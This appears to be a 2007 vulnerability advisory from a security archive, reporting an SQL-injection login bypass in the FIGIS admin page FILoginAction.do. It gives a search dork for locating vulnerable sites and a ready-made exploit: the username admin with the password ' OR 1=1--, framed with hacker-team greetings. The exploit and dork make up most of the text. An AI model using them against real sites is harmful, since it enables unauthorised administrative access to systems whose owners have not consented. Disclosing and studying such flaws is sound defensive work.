FIGIS (FILogin.do) Bypass SQL Injection Vulnerability

2007-11-27T00:00:00
ID SECURITYVULNS:DOC:18516
Type securityvulns
Reporter Securityvulns
Modified 2007-11-27T00:00:00

Description

FIGIS (FILogin.do) Bypass SQL Injection Vulnerability

Download:

Not Available

Bug found by Jose Luis Gуngora Fernбndez / JosS

Contact: sys-project[at]hotmail.com

Spanish Hackers Team

www.spanish-hackers.com

/server irc.freenode.net /join #fullsecure

d0rk: "accionado por FIGIS" / "powered by FIGIS"

Stop lammer

Admin Login:

../PATH/FILoginAction.do http://example.com/fi/FILoginAction.do

Simple - SQL Injection in Admin Login (Exploit)

User: admin Password: ' OR 1=1--

//---------------------------------------\\

Greetz To: All Hackers Jose Luis Gуngora Fernбndez / JosS!